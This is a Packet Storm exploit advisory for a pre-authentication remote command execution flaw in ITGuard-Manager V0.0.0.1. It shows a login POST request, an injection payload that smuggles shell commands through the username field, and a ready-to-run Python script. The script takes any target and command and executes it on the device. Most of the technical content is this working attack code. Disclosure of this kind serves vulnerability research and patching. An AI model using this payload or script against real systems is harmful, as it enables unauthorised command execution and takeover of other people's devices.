ITGuard-Manager 0.0.0.1 Remote Command Execution

2017-12-15T00:00:00
ID PACKETSTORM:145431
Type packetstorm
Reporter Nassim Asrir
Modified 2017-12-15T00:00:00

Description

                                        
                                            `# Vulnerability Title: ITGuard-Manager V0.0.0.1 PreAuth Remote Code Execution   
  
# Author: Nassim Asrir   
  
# Contact: wassline@gmail.com / @asrir_nassim  
  
# CVE: Waiting ...  
  
# CVSS: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P   
  
# Vendor: http://www.innotube.com  
  
  
Details:  
========  
  
First we need to know what happens when we need to LogIn.  
  
When the User or Attacker insert any strings in the login form he/she will get this POST request:   
  
POST /cgi-bin/drknow.cgi?req=login HTTP/1.1   
Host: server  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Referer: http://server/log-in.html?lang=KOR  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 45  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
req=login&lang=KOR&username=admin&password=admin  
  
  
Ok now we have this POST request and all we care about is the username parameter . and we  
  
can execute our system commands via this parameter due to missing input sanitization.  
  
The payload will be: 'admin|'command'||x we will change the command by any *unix command (ls id mkdir .)   
  
Exploit:  
=======  
  
#i am not responsible for any wrong use.  
  
import requests  
  
target = raw_input('Target(With proto) : ')  
  
command = raw_input('Command To Execute : ')  
  
fullpath=target +"/cgi-bin/drknow.cgi?req=login"  
data = {'req':'login',  
'lang':'ENG',  
'username':'admin|'+command+'||x',  
'password':'admin'}  
  
execute = requests.post(fullpath, data = data)  
  
print execute.text  
  
`